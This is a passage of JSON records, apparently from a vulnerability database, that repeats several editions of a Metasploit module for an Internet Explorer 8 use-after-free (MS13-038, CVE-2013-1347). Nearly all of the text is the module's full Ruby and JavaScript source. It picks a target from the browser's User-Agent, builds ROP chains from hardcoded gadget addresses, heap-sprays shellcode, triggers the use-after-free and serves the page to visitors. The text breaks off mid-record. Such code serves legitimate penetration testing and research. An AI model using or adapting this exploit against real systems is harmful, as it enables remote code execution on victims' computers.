implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-08-21T15:30:05", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-10-26T23:40:49", "history": [], "viewCount": 44, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-10-26T23:40:49", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-10-27T01:41:43", "history": [], "viewCount": 46, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-10-27T01:41:43", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-08T23:42:55", "history": [], "viewCount": 46, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-11-08T23:42:55", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-09T01:37:21", "history": [], "viewCount": 49, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not 